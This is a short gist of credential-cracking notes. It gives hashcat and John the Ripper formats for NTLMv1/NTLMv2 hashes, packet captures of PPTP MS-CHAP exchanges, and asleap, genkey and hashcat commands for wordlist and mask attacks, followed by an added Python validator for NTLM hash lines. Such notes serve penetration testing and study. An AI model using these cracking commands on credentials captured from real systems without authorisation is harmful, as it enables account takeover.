
@xardit
Created May 25, 2016 21:11
#hashcat
NTLMv1:
Username::Domain:NetLM/ESS-challenge:NTLMv1hash
Example:
test::LAB:22CDA4417A1442A500000000000000000000000000000000:C4D2A3981677C4E5BDC7ABFB38E81A247EA6908A41F41610:1122334455667788
NTLMv2:
Username::Domain:NTLMv2hash:blob
Example:
hashcat::LAB:1122334455667788:3A8471B7657809F73D4F968CB3AFA085:0101000000000000EF38A99DE914CE01EF187701E27D8A2400000000020000000000000000000000
#JohnRipper
username::::response:challenge
# Wireshark display filter 'chap' - note: copy the VALUE strings as "hex stream"
222 112.531557000 10.20.21.2 10.20.21.3 PPP CHAP 76 Challenge (NAME='pptpd', VALUE=0x56bca293e3d8614f21fdc4caa761d829)
226 112.531938000 10.20.21.3 10.20.21.2 PPP CHAP 113 Response (NAME='admin', VALUE=0x3ed6daa5f7a661b498d80959d30e8b0a0000000000000000...)
227 112.533128000 10.20.21.2 10.20.21.3 PPP CHAP 117 Success (MESSAGE='S=3932B58EC0CC4644B1DDFF1CEE7F8604E56837D1 M=Access granted')
# TCPDUMP - tcpdump proto gre -w chapdump.cap -i eth0
00:21:43.693087 IP 10.20.21.2 > 10.20.21.3: GREv1, call 681, seq 3, length 40: CHAP, Challenge (0x01), id 211, Value 351a6be0809cfa29ba26c8023308f3cd, Name pptpd
00:21:43.693412 IP 10.20.21.3 > 10.20.21.2: GREv1, call 256, seq 5, ack 4, length 77: CHAP, Response (0x02), id 211, Value 98f516e5e62a69285336af58439a212a00000000000000004c791aa993ecaa98f8eb4cb7912753fedcdfd474389e88e900, Name admin
00:21:43.694070 IP 10.20.21.2 > 10.20.21.3: GREv1, call 681, seq 5, ack 5, length 81: CHAP, Success (0x03), id 211, Msg S=2346AC59EC39F61E77BA4E6AA52E38802DB843A3 M=Access granted
# only these two values from the capture are needed
Challenge 8268c79c48db2edb185893d598076f41
Response 06659e8b5764ee5f2147d3c869edc365000000000000000084976047d50c8c597931b31a64510166bb4c04ca508db93100
chap2asleap.py -u <username> -c <32-hex-char challenge> -r <98-hex-char response>
# wordlist attack
asleap -C 48:72:66:02:06:00:df:ff -R 4c:79:1a:a9:93:ec:aa:98:f8:eb:4c:b7:91:27:53:fe:dc:df:d4:74:38:9e:88:e9 -W w.list
# indexed wordlist attack
genkey -r w.list -f w.dat -n w.idx
asleap -C 48:72:66:02:06:00:df:ff -R 4c:79:1a:a9:93:ec:aa:98:f8:eb:4c:b7:91:27:53:fe:dc:df:d4:74:38:9e:88:e9 -f w.dat -n w.idx
Username::Domain:Challenge:NTLMv2hash(aka HMAC-MD5()):blob(entire NTLMv2 response except the HMAC that was in the preceding field)
# Command
hashcat -a 3 -m 5600 testt.hash ?l?l?l?l
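The field layouts above (the NTLMv1 and NTLMv2 lines near the top, and the fuller NTLMv2 description just before the command) are easy to get wrong when pasting by hand, and hashcat's "separator unmatched" or "token length" errors do not say which field is off. The following Python is an added example, not part of this gist and not hashcat's code: it splits a line, checks that each field is hex of the expected length, tells the two formats apart by the fourth field, and for NTLMv2 decodes the blob's fixed header (timestamp and client challenge) so you can see what the blob actually carries. The sample lines are the gist's own two examples; the length rules follow the standard NTLMv1/NTLMv2 response layouts.

```python
"""Parse and sanity-check hashcat-style NTLMv1 (mode 5500) and NTLMv2 (mode 5600)
input lines before handing them to a tool, so a mis-pasted or truncated field is
caught early. Added example for this gist (not the gist's own code); the sample
lines below are the gist's own NTLMv1/NTLMv2 examples."""
from datetime import datetime, timedelta, timezone
import re

HEX = re.compile(r"^[0-9A-Fa-f]+$")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def _hexfield(name, value, expected_len=None):
    """Validate that a field is hex (optionally of a fixed length); return it lower-cased."""
    if not HEX.match(value):
        raise ValueError(f"{name}: not hexadecimal: {value!r}")
    if expected_len is not None and len(value) != expected_len:
        raise ValueError(f"{name}: expected {expected_len} hex chars, got {len(value)}")
    return value.lower()


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_ntlm_line(line):
    """Return a dict describing an NTLMv1 or NTLMv2 hash line, or raise ValueError."""
    parts = line.strip().split(":")
    # Both formats begin user::domain (the empty second field is literal) and have six fields.
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected exactly six colon-separated fields: user::domain:...")
    user, domain = parts[0], parts[2]
    if len(parts[3]) == 48:
        # NTLMv1: user::domain:LM-or-ESS-response(48):NT-response(48):server-challenge(16)
        lm = _hexfield("LM/ESS response", parts[3], 48)
        return {
            "kind": "ntlmv1",
            "user": user,
            "domain": domain,
            "lm_response": lm,
            "nt_response": _hexfield("NT response", parts[4], 48),
            "server_challenge": _hexfield("server challenge", parts[5], 16),
            # With Extended Session Security the LM field is an 8-byte client nonce
            # followed by 16 zero bytes, which is exactly what the gist's example shows.
            "ess": lm[16:] == "0" * 32,
        }
    if len(parts[3]) == 16:
        # NTLMv2: user::domain:server-challenge(16):NTProofStr(32):blob
        # The blob is the NTLMv2_CLIENT_CHALLENGE structure: 0x01 0x01, 6 reserved bytes,
        # 8-byte FILETIME, 8-byte client challenge, 4 reserved bytes (28 bytes fixed),
        # then AV pairs and 4 trailing zero bytes.
        blob = _hexfield("blob", parts[5])
        if len(blob) < 56 or blob[:4] != "0101" or len(blob) % 2:
            raise ValueError("blob must start with 0101 and hold at least the 28-byte fixed header")
        raw = bytes.fromhex(blob)
        ft = int.from_bytes(raw[8:16], "little")
        return {
            "kind": "ntlmv2",
            "user": user,
            "domain": domain,
            "server_challenge": _hexfield("server challenge", parts[3], 16),
            "ntproofstr": _hexfield("NTProofStr (HMAC-MD5)", parts[4], 32),
            "timestamp_filetime": ft,
            "timestamp_utc": filetime_to_datetime(ft),
            "client_challenge": raw[16:24].hex(),
            "av_pairs_hex": raw[28:].hex(),
        }
    raise ValueError("fourth field is neither a 48-hex LM response nor a 16-hex server challenge")


# The gist's own example lines.
NTLMV1_EXAMPLE = ("test::LAB:22CDA4417A1442A500000000000000000000000000000000:"
                  "C4D2A3981677C4E5BDC7ABFB38E81A247EA6908A41F41610:1122334455667788")
NTLMV2_EXAMPLE = ("hashcat::LAB:1122334455667788:3A8471B7657809F73D4F968CB3AFA085:"
                  "0101000000000000EF38A99DE914CE01EF187701E27D8A2400000000"
                  "020000000000000000000000")

if __name__ == "__main__":
    for sample in (NTLMV1_EXAMPLE, NTLMV2_EXAMPLE):
        for key, value in parse_ntlm_line(sample).items():
            print(f"{key:>20}: {value}")
```

Running it on the two gist examples reports the NTLMv1 line as ESS (client nonce plus zero padding in the LM field) and decodes the NTLMv2 blob's FILETIME to a 2013 date, which is a quick way to confirm that the blob field was pasted from the right place: a blob whose timestamp decodes to something nonsensical almost always means the NTProofStr and blob were swapped or the blob was cut short.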